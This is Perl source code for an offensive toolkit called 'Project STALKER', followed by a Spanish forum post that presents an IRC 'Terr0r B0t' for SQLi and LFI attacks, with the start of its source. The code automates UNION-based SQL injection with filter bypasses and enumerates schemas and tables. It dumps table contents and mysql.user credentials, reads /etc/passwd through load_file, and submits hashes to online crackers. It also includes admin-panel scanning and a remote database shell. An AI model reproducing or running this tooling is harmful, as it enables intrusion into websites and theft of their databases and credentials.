print $control;
print "[Status] : Length columns not found\n\n";
menujo();
}
}

sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
$code = toma($inyection);
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
unless ($testar1 eq $testar2) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}}}}}


sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n";
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}}}


sub menu_options {

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "\n/logs/webs/$save>";
chomp (my $rta = <stdin>);

if ($rta=~/help/) {
print qq(

commands : details tables columns dbs othertable othercolumn
          mysqluser dumper logs exit

);
}


if ($rta =~/tables/) {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/columns (.*)/) {
my $tabla = $1;
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($rta =~/dbs/) {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/othertable (.*)/) {
my $data = $1;
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($rta =~/othercolumn (.*) (.*)/){
my ($db,$table) = ($1,$2);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($rta =~/mysqluser/) {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($rta=~/logs/) {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($rta=~/exit/) {
next;
}

elsif ($rta=~/dumper (.*) (.*) (.*)/) {
my ($tabla,$col1,$col2) = ($1,$2,$3);
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($rta =~/details/) {
&details($_[0],$_[1],$save);
&reload;
}
else {
&reload;
}
}



sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}
}

sub reload {
&menu_options($_[0]);
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
print "\n";
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n";
}
print "\n";
}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
print "\n";
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n\n";
}
}

sub dump {
savefile($_[5].".txt","\n");
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "\n\n[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n\n";
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0];
}

sub base {
$re = encode_base64($_[0]);
chomp $re;
return $re;
}

sub base_de {
$re = decode_base64($_[0]);
chomp $re;
return $re;
}


sub download {
if ($nave->mirror($_[0],$_[1])) {
if (-f $_[1]) {
return true;
}}}


sub hex_en {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}
return $hex;
}

sub hex_de {
my $text = shift;
$text =~ s/^0x//;
$encode = join q[], map { chr hex } $text =~ /../g;
return $encode;
}

sub ascii_de {
my $text = shift;
$text = join q[], map { chr } split q[,],$text;
return $text;
}

sub getprocess {

my %procesos;

my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer("","root\\cimv2");

foreach my $pro (in $dos->InstancesOf("Win32_Process")){
$procesos{$pro->{Caption}} = $pro->{ProcessId};
}
return %procesos;
}

sub killprocess {

my ($numb,$pid) = @_;

if (Win32::Process::KillProcess($pid,$numb)) {
return true;
} else {
return false;
}
}

sub getip {
my $get = gethostbyname($_[0]);
return inet_ntoa($get);
}

sub crackit {

my $secret = $_[0];

print "[+] Cracking $_[0]\n\n";

my %hash = (
 
'http://passcracking.com/' => {
'tipo'  => 'post',
'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
},  
'http://md5.hashcracking.com/search.php?md5=' =>  {
'tipo' => 'get',
'regex' => 'Cleartext of $_[0] is (.*)',
},
'http://www.bigtrapeze.com/md5/' =>  {
'tipo' => 'post',
'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
},
'http://opencrack.hashkiller.com/' =>  {
'tipo' => 'post',
'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
},
'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
'tipo' => 'post',
'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
},
'http://victorov.su/md5/?md5e=&md5d=' =>  {
'tipo' => 'get',
'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
}
);

for my $data(keys %hash) {

if ($hash{$data}{tipo} eq "get") {
$code = toma($data.$_[0]);
if ($code=~/$hash{$data}{regex}/ig) {
print "\n[+] Decoded : ".$1."\n\n";
saveyes("logs/pass-found.txt",$secret.":".$1);
}
} else {
$code = tomar($data,$hash{$data}{variables});
if ($code=~/$hash{$data}{regex}/ig) {
saveyes("logs/pass-found.txt",$secret.":".$1);
}
}
}
print "\n[+] Finish\n";
}

sub ftp {

my ($ftp,$user,$pass) = @_;

if (my $socket = Net::FTP->new($ftp)) {
if ($socket->login($user,$pass)) {

print "\n[+] Enter of the server FTP\n\n";

menu:

print "\n\nftp>";
chomp (my $cmd = <stdin>);
print "\n\n";

if ($cmd=~/help/) {
print q(

help : show information
cd : change directory <dir>
dir : list a directory
mdkdir : create a directory <dir>
rmdir : delete a directory <dir>
pwd : directory  
del : delete a file <file>
rename : change name of the a file <file1> <file2>
size : size of the a file <file>
put : upload a file <file>
get : download a file <file>
cdup : change dir <dir>
exit : ??


);
}

if ($cmd=~/dir/ig) {
if (my @files = $socket->dir()) {
for(@files) {
print "[+] ".$_."\n";
}
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/pwd/ig) {
print "[+] Path : ".$socket->pwd()."\n";
}

if ($cmd=~/cd (.*)/ig) {
if ($socket->cwd($1)) {
print "[+] Directory changed\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/cdup/ig) {
if (my $dir = $socket->cdup()) {
print "\n\n[+] Directory changed\n\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/del (.*)/ig) {
if ($socket->delete($1)) {
print "[+] File deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rename (.*) (.*)/ig) {
if ($socket->rename($1,$2)) {
print "[+] File Updated\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/mkdir (.*)/ig) {
if ($socket->mkdir($1)) {
print "\n\n[+] Directory created\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/rmdir (.*)/ig) {
if ($socket->rmdir($1)) {
print "\n\n[+] Directory deleted\n";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/exit/ig) {
next;
}

if ($cmd=~/get (.*) (.*)/ig) {
print "\n\n[+] Downloading file\n\n";
if ($socket->get($1,$2)) {
print "[+] Download completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/put (.*) (.*)/ig) {
print "\n\n[+] Uploading file\n\n";
if ($socket->put($1,$2)) {
print "[+] Upload completed";
} else {
print "\n\n[-] Error\n\n";
}
}

if ($cmd=~/quit/) {
next;
}

goto menu;

} else {
print "\n[-] Failed the login\n\n";
}

} else {
print "\n\n[-] Error\n\n";
}



}


sub scanpaths {

my $urla = $_[0];

print "\n[+] Find paths in $urla\n\n\n";
my @urls = repes(get_links(toma($urla)));
for $url(@urls) {
my $web = $url;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
if ($_[0] =~/$auth/ or $auth eq "") {
if ($path=~/(.*)\/(.*)\.(.*)$/) {
my $borrar = $2.".".$3;
if ($web=~/(.*)$borrar/) {
my $co = $1;
unless ($co=~/$auth/) {
$co = $urla.$co;
}
$code = toma($co);
if ($code=~/Index Of/ig) {
print "[Link] : ".$co."\n";
saveyes("logs/paths-found.txt",$co);
}}}}}
print "\n\n[+] Finish\n";
}


sub scanport {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "[+] Scanning $_[0]\n\n\n";

for my $port(keys %ports) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
print "\n\n[+] Finish\n";
}


sub scanpanel {
print "[+] Scanning $_[0]\n\n\n";
for $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "[Link] : ".$_[0]."/".$path."\n";
saveyes("logs/panel-logs.txt",$_[0]."/".$path);
}
}
print "\n\n[+] Finish\n";
}

sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds;
}


sub sql {

my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
saveyes("logs/sql-logs.txt",$page);
}}

sub get_links {

my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}

}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
cprint "\x0311"; #13
print "\n\n-- == Project STALKER == --\n\n";
cprint "\x030";
}

sub copyright {
cprint "\x0311"; #13
print"\n\n(C) Doddy Hackman 2011\n\n";
cprint "\x030";
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomax {
return $nave->get($_[0]);
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}


sub conectar {

my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
Proto => "tcp",Timeout  => 5);

print $sockex $_[2]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r\n";
}


sub enter {

my ($host,$user,$pass) = @_;

print "[+] Connecting to the server\n";

$info = "dbi:mysql::".$host.":3306";
if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {

print "\n[+] Enter in the database";

while(1) {
print "\n\n\n[+] Query : ";
chomp(my $ac = <stdin>);

if ($ac eq "exit") {
$enter->disconnect;
print "\n\n[+] Closing connection\n\n";
last;
}

$re = $enter->prepare($ac);
$re->execute();
my $total = $re->rows();

my @columnas = @{$re->{NAME}};

if ($total eq "-1") {
print "\n\n[-] Query Error\n";
next;
} else {
print "\n\n[+] Result of the query\n";
if ($total eq 0) {
print "\n\n[+] Not rows returned\n\n";
} else {
print "\n\n[+] Rows returned : ".$total."\n\n\n";
for(@columnas) {
print $_."\t\t";
}
print "\n\n";
while (@row = $re->fetchrow_array) {
for(@row) {
print $_."\t\t";
}
print "\n";
}}}}
} else {
print "\n[-] Error connecting\n";
}}

sub saveyes {
open (SAVE,">>".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}

sub helpme {

cprint "\x0310"; #13
print qq(

Commands :


getinfo
getip <host>
getlink <page>
getprocess
killprocess <name process> <pid process>
conec <host> <port> <command>  
allow <host>
paths <page>
encodehex <text>
decodehex <text>
encodeascii <text>
decodeascii <text>
encodebase <text>
decodebase <text>
scanport <host>
panel <page>
getpass <hash>
kobra <page>
ftp <host> <user> <pass>
mysql <host> <user> <pass>
navegator
scangoogle
help
exit

);
cprint "\x030";
}

#
#  The End ?
#


Hola a todos.

Hoy les traigo un programa que hice anoche , este es un bot irc ,el cual
tiene las siguientes opciones :

* Codificacion y decodificacion de base64 , hex , ascii
* Buscar panel de administracion de algun sitio
* Scan SQLI  (busca numero de columnas y da info)
* Tool para explotar LFI

Comandos para el bot en el canal

Código [Seleccionar] Expandir


!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='


Forma de uso :

Código [Seleccionar] Expandir


C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online



Código (perl) [Seleccionar] Expandir

#!usr/bin/perl
#Terr0r B0t (C) Doddy Hackman 2010
#Commands to use
#
#!base64 encode/decode string
#!hex encode/decode string
#!ascii encode/decode string
#!panel http://127.0.0.1
#!sqli http://127.0.0.1/sql.php?id=
#!lfi http://127.0.0.1/lfi.php?file='
#
#





use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;



@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');


@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.h